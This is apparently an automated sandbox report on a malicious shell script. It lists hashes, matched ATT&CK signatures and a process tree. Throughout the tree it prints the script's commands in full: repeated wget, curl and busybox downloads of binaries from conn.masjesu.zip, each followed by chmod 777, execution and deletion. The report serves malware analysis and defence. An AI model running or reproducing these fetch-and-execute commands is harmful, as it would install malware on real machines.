Analysis
max time kernel: 150s
max time network: 154s
platform: debian-9_mipsel
resource: debian9-mipsel-20240226-en
resource tags: arch:mipsel, image:debian9-mipsel-20240226-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 21/10/2024, 01:39
Static task: static1
Behavioral task: behavioral1
  Sample: 4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
  Resource: ubuntu1804-amd64-20240508-en
Behavioral task: behavioral2
  Sample: 4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: 4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
  Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
  Sample: 4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
  Resource: debian9-mipsel-20240226-en
General
Target: 4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
Size: 10KB
MD5: 95182cb1a6c811823bdbe664fb8ebdf7
SHA1: 05149e5200d9a87556f3bd0c65e34323d70432a5
SHA256: 4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd
SHA512: e4352c11296cd61aa621b235b5b606bd514e11d8ea7f1f0c995d44bffac31476e83638aa6c8f5515f7392ae680fc1be7ad4e62ea026ffe5cb2f063950e6ffa7e
SSDEEP: 192:sFi6S/T/e2aFgAuWzGciFi6S/TG2aFgAoG:sFi6S/T/NWzhiFi6S/TM
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 10 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Process: chmod, PIDs 777, 814, 821, 828, 835, 842, 849, 856, 863, 870
- Executes dropped EXE (10 IoCs)
  ioc  pid  Process
  /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl  778  xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl
  /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb  815  CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb
  /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH  822  M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH
  /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI  829  JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI
  /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q  836  c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q
  /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv  843  bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv
  /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K  850  eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K
  /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B  857  VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B
  /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  864  J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg
  /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  871  8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83
- Reads runtime system information
  description  ioc  Process
  File opened for reading  /proc/sys/crypto/fips_enabled  curl  (11 identical entries)
- System Network Configuration Discovery (1 TTPs, 32 IoCs)
  Adversaries may gather information about the network configuration of a system.
  Process: wget, PIDs 705, 780, 817, 824, 831, 838, 845, 852, 859, 866, 873
  Process: curl, PIDs 759, 804, 818, 825, 832, 839, 846, 853, 860, 867, 874
  Process: busybox, PIDs 773, 813, 820, 827, 834, 841, 848, 855, 862, 869
- Writes file to tmp directory (10 IoCs)
  Malware often drops required files in the /tmp directory.
  description  ioc  Process
  File opened for modification  /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl  curl
  File opened for modification  /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv  curl
  File opened for modification  /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K  curl
  File opened for modification  /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  curl
  File opened for modification  /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb  curl
  File opened for modification  /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH  curl
  File opened for modification  /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI  curl
  File opened for modification  /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q  curl
  File opened for modification  /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B  curl
  File opened for modification  /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  curl
Processes
Each entry gives the PID, the executable path, the command line (cmd:) and, in brackets, the signatures matched on that process. Indentation shows the parent/child relationship.
- PID 697  /tmp/4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh  cmd: /tmp/4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
  - PID 700  /bin/rm  cmd: /bin/rm bins.sh
  - PID 705  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl  [System Network Configuration Discovery]
  - PID 759  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 773  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl  [System Network Configuration Discovery]
  - PID 777  /bin/chmod  cmd: chmod 777 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl  [File and Directory Permissions Modification]
  - PID 778  /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl  cmd: ./xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl  [Executes dropped EXE]
  - PID 779  /bin/rm  cmd: rm xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl
  - PID 780  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb  [System Network Configuration Discovery]
  - PID 804  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 813  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb  [System Network Configuration Discovery]
  - PID 814  /bin/chmod  cmd: chmod 777 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb  [File and Directory Permissions Modification]
  - PID 815  /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb  cmd: ./CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb  [Executes dropped EXE]
  - PID 816  /bin/rm  cmd: rm CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb
  - PID 817  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH  [System Network Configuration Discovery]
  - PID 818  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 820  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH  [System Network Configuration Discovery]
  - PID 821  /bin/chmod  cmd: chmod 777 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH  [File and Directory Permissions Modification]
  - PID 822  /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH  cmd: ./M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH  [Executes dropped EXE]
  - PID 823  /bin/rm  cmd: rm M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH
  - PID 824  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI  [System Network Configuration Discovery]
  - PID 825  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 827  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI  [System Network Configuration Discovery]
  - PID 828  /bin/chmod  cmd: chmod 777 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI  [File and Directory Permissions Modification]
  - PID 829  /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI  cmd: ./JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI  [Executes dropped EXE]
  - PID 830  /bin/rm  cmd: rm JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI
  - PID 831  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q  [System Network Configuration Discovery]
  - PID 832  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 834  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q  [System Network Configuration Discovery]
  - PID 835  /bin/chmod  cmd: chmod 777 c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q  [File and Directory Permissions Modification]
  - PID 836  /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q  cmd: ./c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q  [Executes dropped EXE]
  - PID 837  /bin/rm  cmd: rm c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q
  - PID 838  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv  [System Network Configuration Discovery]
  - PID 839  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 841  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv  [System Network Configuration Discovery]
  - PID 842  /bin/chmod  cmd: chmod 777 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv  [File and Directory Permissions Modification]
  - PID 843  /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv  cmd: ./bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv  [Executes dropped EXE]
  - PID 844  /bin/rm  cmd: rm bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv
  - PID 845  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K  [System Network Configuration Discovery]
  - PID 846  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 848  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K  [System Network Configuration Discovery]
  - PID 849  /bin/chmod  cmd: chmod 777 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K  [File and Directory Permissions Modification]
  - PID 850  /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K  cmd: ./eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K  [Executes dropped EXE]
  - PID 851  /bin/rm  cmd: rm eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K
  - PID 852  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B  [System Network Configuration Discovery]
  - PID 853  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 855  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B  [System Network Configuration Discovery]
  - PID 856  /bin/chmod  cmd: chmod 777 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B  [File and Directory Permissions Modification]
  - PID 857  /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B  cmd: ./VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B  [Executes dropped EXE]
  - PID 858  /bin/rm  cmd: rm VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B
  - PID 859  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [System Network Configuration Discovery]
  - PID 860  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 862  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [System Network Configuration Discovery]
  - PID 863  /bin/chmod  cmd: chmod 777 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [File and Directory Permissions Modification]
  - PID 864  /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  cmd: ./J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [Executes dropped EXE]
  - PID 865  /bin/rm  cmd: rm J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg
  - PID 866  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [System Network Configuration Discovery]
  - PID 867  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 869  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [System Network Configuration Discovery]
  - PID 870  /bin/chmod  cmd: chmod 777 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [File and Directory Permissions Modification]
  - PID 871  /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  cmd: ./8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [Executes dropped EXE]
  - PID 872  /bin/rm  cmd: rm 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83
  - PID 873  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn  [System Network Configuration Discovery]
  - PID 874  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn  [Reads runtime system information; System Network Configuration Discovery]
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97